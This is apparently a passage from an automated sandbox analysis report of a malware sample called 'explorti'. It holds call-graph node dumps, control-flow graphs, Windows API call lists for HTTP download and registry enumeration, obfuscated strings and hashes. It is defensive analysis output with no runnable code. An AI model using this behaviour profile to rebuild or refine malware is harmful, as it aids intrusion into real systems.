13774->13775 13776 2c32f2 InternetCloseHandle InternetCloseHandle 13774->13776 13774->13778 13774->13779 13775->13774 13776->13774 13777 2c351a shared_ptr std::_Xinvalid_argument 13777->13734 13778->13773 13779->13777 13781 2baca0 4 API calls 13779->13781 13785 2c38f5 shared_ptr __dosmaperr 13779->13785 13780 2e8979 4 API calls 13782 2c3a8a 13780->13782 13781->13785 13782->13777 13783 2c3e52 13782->13783 13786 2c3b9d 13782->13786 13788 2c3ab2 13782->13788 13784 2c2e20 12 API calls 13783->13784 13784->13777 13785->13777 13785->13780 13787 2c1dd0 12 API calls 13786->13787 13787->13777 13789 2c07f0 4 API calls 13788->13789 13789->13777 13791 2b5520 13790->13791 13793 2b5620 13791->13793 13794 2b2280 13791->13794 13793->13750 13797 2b2240 13794->13797 13798 2b2256 13797->13798 13801 2e8667 13798->13801 13804 2e7456 13801->13804 13803 2b2264 13803->13791 13805 2e7496 13804->13805 13809 2e747e __cftof __dosmaperr 13804->13809 13806 2e683a __fassign 4 API calls 13805->13806 13805->13809 13807 2e74ae 13806->13807 13810 2e7a11 13807->13810 13809->13803 13812 2e7a22 13810->13812 13811 2e7a31 __cftof __dosmaperr 13811->13809 13812->13811 13813 2e7c0f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13812->13813 13814 2e7c35 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13812->13814 13815 2e7d83 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13812->13815 13816 2e7fb5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13812->13816 13813->13812 13814->13812 13815->13812 13816->13812 13818 2e86d7 4 API calls 13817->13818 13819 2e8a9f 13818->13819 13819->13728 13820 2c8700 13821 2c875a __cftof 13820->13821 13827 2c9ae0 13821->13827 13823 2c8784 13826 2c879c 13823->13826 13831 2b43b0 13823->13831 13825 2c8809 std::_Throw_future_error 13828 2c9b15 13827->13828 13837 2b2ca0 13828->13837 13830 2c9b46 13830->13823 13832 2cbe0f InitOnceExecuteOnce 13831->13832 13833 2b43ca 13832->13833 13834 2b43d1 13833->13834 13835 2e6beb 9 API calls 13833->13835 13834->13825 13836 2b43e4 13835->13836 13838 2b2cdd 13837->13838 13839 2cbe0f InitOnceExecuteOnce 13838->13839 13841 2b2d06 13839->13841 13840 2b2d11 13840->13830 13841->13840 13843 2b2d48 13841->13843 13846 2cbe27 13841->13846 13853 2b2400 13843->13853 13847 2cbe33 std::_Xinvalid_argument 13846->13847 13848 2cbe9a 13847->13848 13849 2cbea3 13847->13849 13856 2cbdaf 13848->13856 13851 2b2aa0 10 API calls 13849->13851 13852 2cbe9f 13851->13852 13852->13843 13874 2cb506 13853->13874 13855 2b2432 13857 2ccb61 InitOnceExecuteOnce 13856->13857 13858 2cbdc7 13857->13858 13859 2cbdce 13858->13859 13862 2e6beb 13858->13862 13859->13852 13861 2cbdd7 13861->13852 13868 2e6bf7 13862->13868 13863 2e8aaf __fassign 4 API calls 13864 2e6c26 13863->13864 13865 2e6c35 13864->13865 13866 2e6c43 13864->13866 13869 2e6c99 9 API calls 13865->13869 13867 2e68bd 4 API calls 13866->13867 13871 2e6c5d 13867->13871 13868->13863 13870 2e6c3f 13869->13870 13870->13861 13872 2e6c99 9 API calls 13871->13872 13873 2e6c71 ___free_lconv_mon 13871->13873 13872->13873 13873->13861 13875 2cb521 std::_Xinvalid_argument 13874->13875 13876 2e8aaf __fassign 4 API calls 13875->13876 13878 2cb588 __fassign 13875->13878 13877 2cb5cf 13876->13877 13878->13855 13890 2ca140 13891 2ca1c0 13890->13891 13897 2c7040 13891->13897 13893 2ca1fc shared_ptr 13894 2ca3ee shared_ptr 13893->13894 13901 2b3ea0 13893->13901 13896 2ca3d6 13899 2c7081 __cftof __Mtx_init_in_situ 13897->13899 13898 2c72b6 13898->13893 13899->13898 13907 2b2e80 13899->13907 13902 2b3f08 13901->13902 13904 2b3ede 13901->13904 13905 2b3f18 13902->13905 13954 2b2bc0 13902->13954 13904->13896 13905->13896 13908 2b2f3e GetCurrentThreadId 13907->13908 13909 2b2ec6 13907->13909 13910 2b2f54 13908->13910 13927 2b2faf 13908->13927 13911 2cc5dc GetSystemTimePreciseAsFileTime 13909->13911 13917 2cc5dc GetSystemTimePreciseAsFileTime 13910->13917 13910->13927 13912 2b2ed2 13911->13912 13913 2b2fde 13912->13913 13914 2b2edd __Mtx_unlock 13912->13914 13915 2cc19a 10 API calls 13913->13915 13916 2b2fe4 13914->13916 13920 2b2f2f 13914->13920 13915->13916 13918 2cc19a 10 API calls 13916->13918 13919 2b2f79 13917->13919 13918->13919 13921 2cc19a 10 API calls 13919->13921 13922 2b2f80 __Mtx_unlock 13919->13922 13920->13908 13920->13927 13921->13922 13923 2cc19a 10 API calls 13922->13923 13924 2b2f98 __Cnd_broadcast 13922->13924 13923->13924 13925 2cc19a 10 API calls 13924->13925 13924->13927 13926 2b2ffc 13925->13926 13928 2cc5dc GetSystemTimePreciseAsFileTime 13926->13928 13927->13898 13936 2b3040 shared_ptr __Mtx_unlock 13928->13936 13929 2b3185 13930 2cc19a 10 API calls 13929->13930 13931 2b318b 13930->13931 13932 2cc19a 10 API calls 13931->13932 13933 2b3191 13932->13933 13934 2cc19a 10 API calls 13933->13934 13942 2b3153 __Mtx_unlock 13934->13942 13935 2b3167 13935->13898 13936->13929 13936->13931 13936->13935 13938 2b30f2 GetCurrentThreadId 13936->13938 13937 2cc19a 10 API calls 13939 2b319d 13937->13939 13938->13935 13940 2b30fb 13938->13940 13940->13935 13941 2cc5dc GetSystemTimePreciseAsFileTime 13940->13941 13943 2b311f 13941->13943 13942->13935 13942->13937 13943->13929 13943->13933 13943->13942 13945 2cbc7c 13943->13945 13948 2cbaa2 13945->13948 13947 2cbc8c 13947->13943 13949 2cbacc 13948->13949 13950 2cce9b _xtime_get GetSystemTimePreciseAsFileTime 13949->13950 13953 2cbad4 __Xtime_diff_to_millis2 13949->13953 13951 2cbaff __Xtime_diff_to_millis2 13950->13951 13952 2cce9b _xtime_get GetSystemTimePreciseAsFileTime 13951->13952 13951->13953 13952->13953 13953->13947 13955 2b2bce 13954->13955 13961 2cb777 13955->13961 13957 2b2c02 13958 2b2c09 13957->13958 13967 2b2c40 13957->13967 13958->13896 13960 2b2c18 std::_Xinvalid_argument 13962 2cb7a3 Concurrency::details::_Reschedule_chore 13961->13962 13963 2cb784 13961->13963 13962->13957 13970 2ccaa7 13963->13970 13965 2cb794 13965->13962 13972 2cb74e 13965->13972 13978 2cb72b 13967->13978 13969 2b2c72 shared_ptr 13969->13960 13971 2ccac2 CreateThreadpoolWork 13970->13971 13971->13965 13973 2cb757 Concurrency::details::_Reschedule_chore 13972->13973 13976 2cccfc 13973->13976 13975 2cb771 13975->13962 13977 2ccd11 TpPostWork 13976->13977 13977->13975 13979 2cb747 13978->13979 13980 2cb737 13978->13980 13979->13969 13980->13979 13982 2cc9a8 13980->13982 13983 2cc9bd TpReleaseWork 13982->13983 13983->13979 13598 2cb85e 13603 2cb6e5 13598->13603 13600 2cb886 13611 2cb648 13600->13611 13602 2cb89f 13604 2cb6f1 Concurrency::details::_Reschedule_chore 13603->13604 13605 2cb722 13604->13605 13621 2cc5dc 13604->13621 13605->13600 13609 2cb70c __Mtx_unlock 13610 2b2ad0 10 API calls 13609->13610 13610->13605 13612 2cb654 Concurrency::details::_Reschedule_chore 13611->13612 13613 2cc5dc GetSystemTimePreciseAsFileTime 13612->13613 13614 2cb6ae 13612->13614 13615 2cb669 13613->13615 13614->13602 13616 2b2ad0 10 API calls 13615->13616 13617 2cb66f __Mtx_unlock 13616->13617 13618 2b2ad0 10 API calls 13617->13618 13619 2cb68c __Cnd_broadcast 13618->13619 13619->13614 13620 2b2ad0 10 API calls 13619->13620 13620->13614 13629 2cc382 13621->13629 13623 2cb706 13624 2b2ad0 13623->13624 13625 2b2ada 13624->13625 13626 2b2adc 13624->13626 13625->13609 13646 2cc19a 13626->13646 13630 2cc3d8 13629->13630 13632 2cc3aa 13629->13632 13630->13632 13635 2cce9b 13630->13635 13632->13623 13633 2cc42d __Xtime_diff_to_millis2 13633->13632 13634 2cce9b _xtime_get GetSystemTimePreciseAsFileTime 13633->13634 13634->13633 13636 2cceaa 13635->13636 13638 2cceb7 __aulldvrm 13635->13638 13636->13638 13639 2cce74 13636->13639 13638->13633 13642 2ccb1a 13639->13642 13643 2ccb2b GetSystemTimePreciseAsFileTime 13642->13643 13644 2ccb37 13642->13644 13643->13644 13644->13638 13647 2cc1c2 13646->13647 13648 2cc1a4 13646->13648 13647->13647 13648->13647 13650 2cc1c7 13648->13650 13653 2b2aa0 13650->13653 13652 2cc1de std::_Xinvalid_argument 13652->13648 13667 2cbe0f 13653->13667 13655 2b2abf 13655->13652 13656 2e8aaf __fassign 4 API calls 13657 2e6c26 13656->13657 13658 2e6c35 13657->13658 13659 2e6c43 13657->13659 13661 2e6c99 9 API calls 13658->13661 13660 2e68bd 4 API calls 13659->13660 13664 2e6c5d 13660->13664 13662 2e6c3f 13661->13662 13662->13652 13663 2b2ab4 13663->13655 13663->13656 13665 2e6c99 9 API calls 13664->13665 13666 2e6c71 ___free_lconv_mon 13664->13666 13665->13666 13666->13652 13670 2ccb61 13667->13670 13671 2ccb6f InitOnceExecuteOnce 13670->13671 13673 2cbe22 13670->13673 13671->13673 13673->13663 13984 2e6559 13985 2e63f7 __fassign 2 API calls 13984->13985 13986 2e656a 13985->13986 13885 2e6974 13886 2e698c 13885->13886 13887 2e6982 13885->13887 13888 2e68bd 4 API calls 13886->13888 13889 2e69a6 ___free_lconv_mon 13888->13889 13588 2be410 13589 2be419 13588->13589 13591 2be435 13588->13591 13589->13591 13592 2be270 13589->13592 13593 2be280 __dosmaperr 13592->13593 13594 2e8979 4 API calls 13593->13594 13596 2be2bd std::_Xinvalid_argument 13594->13596 13595 2be435 13595->13589 13596->13595 13597 2be270 4 API calls 13596->13597 13597->13596 13674 2b86b0 13675 2b86b6 13674->13675 13676 2e6659 RtlAllocateHeap 13675->13676 13677 2b86c3 13676->13677 13678 2b86d6 13677->13678 13679 2e66e7 4 API calls 13677->13679 13680 2b86d0 13679->13680 13998 2bdfd0 recv 13999 2be032 recv 13998->13999 14000 2be067 recv 13999->14000 14001 2be0a1 14000->14001 14002 2be1c3 14001->14002 14003 2cc5dc GetSystemTimePreciseAsFileTime 14001->14003 14004 2be1fe 14003->14004 14005 2cc19a 10 API calls 14004->14005 14006 2be268 14005->14006 13450 2c1dd0 13453 2c1e6b shared_ptr __dosmaperr 13450->13453 13451 2c1e78 13454 2be440 6 API calls 13451->13454 13452 2c2936 shared_ptr std::_Xinvalid_argument 13453->13451 13453->13452 13467 2e8979 13453->13467 13454->13452 13457 2c2265 shared_ptr 13457->13452 13471 2e6659 13457->13471 13460 2c268b shared_ptr __dosmaperr 13460->13452 13461 2e8979 4 API calls 13460->13461 13462 2c2759 13461->13462 13462->13451 13462->13452 13463 2c27d1 13462->13463 13478 2be440 13463->13478 13465 2c2843 13465->13452 13493 2b5df0 13465->13493 13468 2e8994 13467->13468 13500 2e86d7 13468->13500 13470 2e899e 13470->13457 13524 2e65a2 13471->13524 13473 2c267a 13473->13451 13474 2e66e7 13473->13474 13475 2e66f3 13474->13475 13476 2e66fd __cftof __dosmaperr 13475->13476 13536 2e6670 13475->13536 13476->13460 13479 2be489 13478->13479 13559 2bbd60 13479->13559 13481 2be9a9 shared_ptr 13481->13465 13482 2be711 13482->13481 13483 2be440 6 API calls 13482->13483 13485 2bf696 13483->13485 13484 2bf892 shared_ptr 13484->13465 13485->13484 13486 2be440 6 API calls 13485->13486 13488 2bf973 13486->13488 13487 2bfa45 shared_ptr 13487->13465 13488->13487 13489 2e6659 RtlAllocateHeap 13488->13489 13490 2bfbf1 13489->13490 13491 2be440 6 API calls 13490->13491 13492 2c054c shared_ptr 13491->13492 13492->13465 13495 2b5e28 13493->13495 13494 2b5f0e shared_ptr 13494->13452 13495->13494 13496 2b6060 RegOpenKeyExA 13495->13496 13497 2b645a shared_ptr 13496->13497 13499 2b60b3 __cftof 13496->13499 13497->13452 13498 2b6153 RegEnumValueW 13498->13499 13499->13497 13499->13498 13501 2e86e9 13500->13501 13502 2e683a __fassign 4 API calls 13501->13502 13505 2e86fe __cftof __dosmaperr 13501->13505 13504 2e872e 13502->13504 13504->13505 13506 2e8925 13504->13506 13505->13470 13507 2e8962 13506->13507 13508 2e8932 13506->13508 13517 2ed2e9 13507->13517 13511 2e8941 __fassign 13508->13511 13512 2ed30d 13508->13512 13511->13504 13513 2e683a __fassign 4 API calls 13512->13513 13514 2ed32a 13513->13514 13516 2ed33a 13514->13516 13521 2ef07f 13514->13521 13516->13511 13518 2ed2f4 13517->13518 13519 2eb4bb __fassign 4 API calls 13518->13519 13520 2ed304 13519->13520 13520->13511 13522 2e683a __fassign 4 API calls 13521->13522 13523 2ef09f __cftof __fassign __freea 13522->13523 13523->13516 13525 2e65ae 13524->13525 13526 2e65b5 __cftof __dosmaperr 13525->13526 13528 2ea783 13525->13528 13526->13473 13529 2ea78f 13528->13529 13532 2ea827 13529->13532 13531 2ea7aa 13531->13526 13534 2ea84a 13532->13534 13533 2ed6ef RtlAllocateHeap 13535 2ea890 ___free_lconv_mon 13533->13535 13534->13533 13534->13535 13535->13531 13537 2e6692 13536->13537 13539 2e667d __cftof __dosmaperr ___free_lconv_mon 13536->13539 13537->13539 13540 2e9ef9 13537->13540 13539->13476 13541 2e9f36 13540->13541 13542 2e9f11 13540->13542 13541->13539 13542->13541 13544 2f02f8 13542->13544 13545 2f0304 13544->13545 13547 2f030c __cftof __dosmaperr 13545->13547 13548 2f03ea 13545->13548 13547->13541 13549 2f0410 __cftof __dosmaperr 13548->13549 13550 2f040c 13548->13550 13549->13547 13550->13549 13552 2efb7f 13550->13552 13553 2efbcc 13552->13553 13554 2e683a __fassign 4 API calls 13553->13554 13558 2efbdb __cftof 13554->13558 13555 2ed2e9 4 API calls 13555->13558 13556 2ec4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 13556->13558 13557 2efe7b 13557->13549 13558->13555 13558->13556 13558->13557 13558->13558 13560 2bbdb2 13559->13560 13562 2bc14e shared_ptr 13559->13562 13561 2bbdc6 InternetOpenW InternetConnectA 13560->13561 13560->13562 13563 2bbe3d 13561->13563 13562->13482 13564 2bbe53 HttpOpenRequestA 13563->13564 13565 2bbe71 shared_ptr 13564->13565 13566 2bbf13 HttpSendRequestA 13565->13566 13568 2bbf2b shared_ptr 13566->13568 13567 2bbfb3 InternetReadFile 13569 2bbfda 13567->13569 13568->13567 13879 2c9310 13880 2c9325 13879->13880 13884 2c9363 13879->13884 13881 2cd041 SleepConditionVariableCS 13880->13881 13882 2c932f 13881->13882 13883 2ccff7 RtlWakeAllConditionVariable 13882->13883 13882->13884 13883->13884

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 760 2bbd60-2bbdac 761 2bbdb2-2bbdb6 760->761 762 2bc1a1-2bc1c6 call 2c7f30 760->762 761->762 764 2bbdbc-2bbdc0 761->764 767 2bc1c8-2bc1d4 762->767 768 2bc1f4-2bc20c 762->768 764->762 766 2bbdc6-2bbe4f InternetOpenW InternetConnectA call 2c7870 call 2b5b20 764->766 791 2bbe53-2bbe6f HttpOpenRequestA 766->791 792 2bbe51 766->792 770 2bc1ea-2bc1f1 call 2cd593 767->770 771 2bc1d6-2bc1e4 767->771 772 2bc158-2bc170 768->772 773 2bc212-2bc21e 768->773 770->768 771->770 775 2bc26f-2bc274 call 2e6b9a 771->775 779 2bc243-2bc25f call 2ccf21 772->779 780 2bc176-2bc182 772->780 777 2bc14e-2bc155 call 2cd593 773->777 778 2bc224-2bc232 773->778 777->772 778->775 787 2bc234 778->787 788 2bc239-2bc240 call 2cd593 780->788 789 2bc188-2bc196 780->789 787->777 788->779 789->775 790 2bc19c 789->790 790->788 797 2bbe71-2bbe80 791->797 798 2bbea0-2bbf0f call 2c7870 call 2b5b20 call 2c7870 call 2b5b20 791->798 792->791 800 2bbe82-2bbe90 797->800 801 2bbe96-2bbe9d call 2cd593 797->801 812 2bbf13-2bbf29 HttpSendRequestA 798->812 813 2bbf11 798->813 800->801 801->798 814 2bbf2b-2bbf3a 812->814 815 2bbf5a-2bbf82 812->815 813->812 816 2bbf3c-2bbf4a 814->816 817 2bbf50-2bbf57 call 2cd593 814->817 818 2bbfb3-2bbfd4 InternetReadFile 815->818 819 2bbf84-2bbf93 815->819 816->817 817->815 823 2bbfda 818->823 821 2bbfa9-2bbfb0 call 2cd593 819->821 822 2bbf95-2bbfa3 819->822 821->818 822->821 824 2bbfe0-2bc090 call 2e4180 823->824
                      APIs
                      • InternetOpenW.WININET(00308D68,00000000,00000000,00000000,00000000), ref: 002BBDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 002BBE11
                      • HttpOpenRequestA.WININET(?,00000000), ref: 002BBE5B
                      • HttpSendRequestA.WININET(?,00000000), ref: 002BBF1A
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 002BBFCD
                      • InternetCloseHandle.WININET(?), ref: 002BC0A7
                      • InternetCloseHandle.WININET(?), ref: 002BC0AF
                      • InternetCloseHandle.WININET(?), ref: 002BC0B7
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$d41$invalid stoi argument$stoi argument out of range
                      • API String ID: 688256393-1161962885
                      • Opcode ID: 106146e5bee25d04d3153af46ebc1718ab4a19721e8a7cdba946dbe6d586e94e
                      • Instruction ID: f2ed1d4a74ccb30deedfdc9a2a7ee43662bc95ec1cf2c1227807dc5ce35921a7
                      • Opcode Fuzzy Hash: 106146e5bee25d04d3153af46ebc1718ab4a19721e8a7cdba946dbe6d586e94e
                      • Instruction Fuzzy Hash: F5B1F4B16201189BEB28DF28CC85BEEBB79EF45344F5042A9F508972C2D7719AD0CF95

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1141 2b65b0-2b6609 1215 2b660a call 5520d32 1141->1215 1216 2b660a call 5520c73 1141->1216 1217 2b660a call 5520cd3 1141->1217 1218 2b660a call 5520d96 1141->1218 1219 2b660a call 5520d18 1141->1219 1220 2b660a call 5520c18 1141->1220 1221 2b660a call 5520bf9 1141->1221 1222 2b660a call 5520d7c 1141->1222 1223 2b660a call 5520c5c 1141->1223 1224 2b660a call 5520bdc 1141->1224 1225 2b660a call 5520d02 1141->1225 1226 2b660a call 5520c40 1141->1226 1227 2b660a call 5520bc0 1141->1227 1228 2b660a call 5520ce1 1141->1228 1229 2b660a call 5520d46 1141->1229 1230 2b660a call 5520cc7 1141->1230 1231 2b660a call 5520c2f 1141->1231 1232 2b660a call 5520c4d 1141->1232 1142 2b660f-2b6688 LookupAccountNameA call 2c7870 call 2b5b20 1148 2b668a 1142->1148 1149 2b668c-2b66ab call 2b2280 1142->1149 1148->1149 1152 2b66ad-2b66bc 1149->1152 1153 2b66dc-2b66e2 1149->1153 1154 2b66be-2b66cc 1152->1154 1155 2b66d2-2b66d9 call 2cd593 1152->1155 1156 2b66e5-2b66ea 1153->1156 1154->1155 1157 2b6907 call 2e6b9a 1154->1157 1155->1153 1156->1156 1159 2b66ec-2b6714 call 2c7870 call 2b5b20 1156->1159 1164 2b690c call 2e6b9a 1157->1164 1170 2b6718-2b6739 call 2b2280 1159->1170 1171 2b6716 1159->1171 1168 2b6911-2b6916 call 2e6b9a 1164->1168 1175 2b673b-2b674a 1170->1175 1176 2b676a-2b677e 1170->1176 1171->1170 1177 2b674c-2b675a 1175->1177 1178 2b6760-2b6767 call 2cd593 1175->1178 1182 2b6828-2b684c 1176->1182 1183 2b6784-2b678a 1176->1183 1177->1164 1177->1178 1178->1176 1185 2b6850-2b6855 1182->1185 1184 2b6790-2b67bd call 2c7870 call 2b5b20 1183->1184 1198 2b67bf 1184->1198 1199 2b67c1-2b67e8 call 2b2280 1184->1199 1185->1185 1186 2b6857-2b68bc call 2c7f30 * 2 1185->1186 1196 2b68e9-2b6906 call 2ccf21 1186->1196 1197 2b68be-2b68cd 1186->1197 1200 2b68df-2b68e6 call 2cd593 1197->1200 1201 2b68cf-2b68dd 1197->1201 1198->1199 1208 2b67ea-2b67f9 1199->1208 1209 2b6819-2b681c 1199->1209 1200->1196 1201->1168 1201->1200 1210 2b67fb-2b6809 1208->1210 1211 2b680f-2b6816 call 2cd593 1208->1211 1209->1184 1212 2b6822 1209->1212 1210->1157 1210->1211 1211->1209 1212->1182 1215->1142 1216->1142 1217->1142 1218->1142 1219->1142 1220->1142 1221->1142 1222->1142 1223->1142 1224->1142 1225->1142 1226->1142 1227->1142 1228->1142 1229->1142 1230->1142 1231->1142 1232->1142
                      APIs
                      • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 002B6650
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: AccountLookupName
                      • String ID: EUVmdK==$GUPmdK==$PAUfbBZl
                      • API String ID: 1484870144-2376134257
                      • Opcode ID: 20d6c3060acf53fc8ebc58b0df42fdb2393bc754a8a4f4395353aaf41026d12b
                      • Instruction ID: f1c0cf435b2768983f924906846c48e42da9b109627e1b0c9176ce99ce81c71f
                      • Opcode Fuzzy Hash: 20d6c3060acf53fc8ebc58b0df42fdb2393bc754a8a4f4395353aaf41026d12b
                      • Instruction Fuzzy Hash: CB91C2B19101189BDB28DF24CC89BEDB779EF49344F4046EDE50997282DA349BD8CFA4
                      APIs
                        • Part of subcall function 002C7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 002C795C
                        • Part of subcall function 002C7870: __Cnd_destroy_in_situ.LIBCPMT ref: 002C7968
                        • Part of subcall function 002C7870: __Mtx_destroy_in_situ.LIBCPMT ref: 002C7971
                        • Part of subcall function 002BBD60: InternetOpenW.WININET(00308D68,00000000,00000000,00000000,00000000), ref: 002BBDED
                        • Part of subcall function 002BBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 002BBE11
                        • Part of subcall function 002BBD60: HttpOpenRequestA.WININET(?,00000000), ref: 002BBE5B
                      • std::_Xinvalid_argument.LIBCPMT ref: 002C4EA2
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                      • String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$stoi argument out of range$-1
                      • API String ID: 2414744145-991459688
                      • Opcode ID: 83fdafec3538e1bdc4e722328826c7eb6f2db849a38ca13d1400895957263612
                      • Instruction ID: d9813221f3e774224b334203033a395cc99a1959e998a12766df36d2d605f74d
                      • Opcode Fuzzy Hash: 83fdafec3538e1bdc4e722328826c7eb6f2db849a38ca13d1400895957263612
                      • Instruction Fuzzy Hash: 632325709201589BEB19DB28CD89B9DBB769F85304F5482DCE009AB2C2DB359FE4CF51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 915 2b5df0-2b5eee 921 2b5f18-2b5f25 call 2ccf21 915->921 922 2b5ef0-2b5efc 915->922 923 2b5f0e-2b5f15 call 2cd593 922->923 924 2b5efe-2b5f0c 922->924 923->921 924->923 926 2b5f26-2b60ad call 2e6b9a call 2ce080 call 2c7f30 * 5 RegOpenKeyExA 924->926 944 2b6478-2b6481 926->944 945 2b60b3-2b6143 call 2e4020 926->945 946 2b64ae-2b64b7 944->946 947 2b6483-2b648e 944->947 968 2b6149-2b614d 945->968 969 2b6466-2b6472 945->969 951 2b64b9-2b64c4 946->951 952 2b64e4-2b64ed 946->952 949 2b6490-2b649e 947->949 950 2b64a4-2b64ab call 2cd593 947->950 949->950 956 2b659e-2b65a3 call 2e6b9a 949->956 950->946 958 2b64da-2b64e1 call 2cd593 951->958 959 2b64c6-2b64d4 951->959 954 2b651a-2b6523 952->954 955 2b64ef-2b64fa 952->955 963 2b654c-2b6555 954->963 964 2b6525-2b6530 954->964 960 2b64fc-2b650a 955->960 961 2b6510-2b6517 call 2cd593 955->961 958->952 959->956 959->958 960->956 960->961 961->954 974 2b6582-2b659d call 2ccf21 963->974 975 2b6557-2b6566 963->975 972 2b6542-2b6549 call 2cd593 964->972 973 2b6532-2b6540 964->973 977 2b6153-2b6187 RegEnumValueW 968->977 978 2b6460 968->978 969->944 972->963 973->956 973->972 982 2b6578-2b657f call 2cd593 975->982 983 2b6568-2b6576 975->983 985 2b644d-2b6454 977->985 986 2b618d-2b61ad 977->986 978->969 982->974 983->956 983->982 985->977 992 2b645a 985->992 991 2b61b0-2b61b9 986->991 991->991 993 2b61bb-2b624d call 2c7c50 call 2c8090 call 2c7870 * 2 call 2b5c60 991->993 992->978 993->985
                      Strings
                      Memory Dump Source
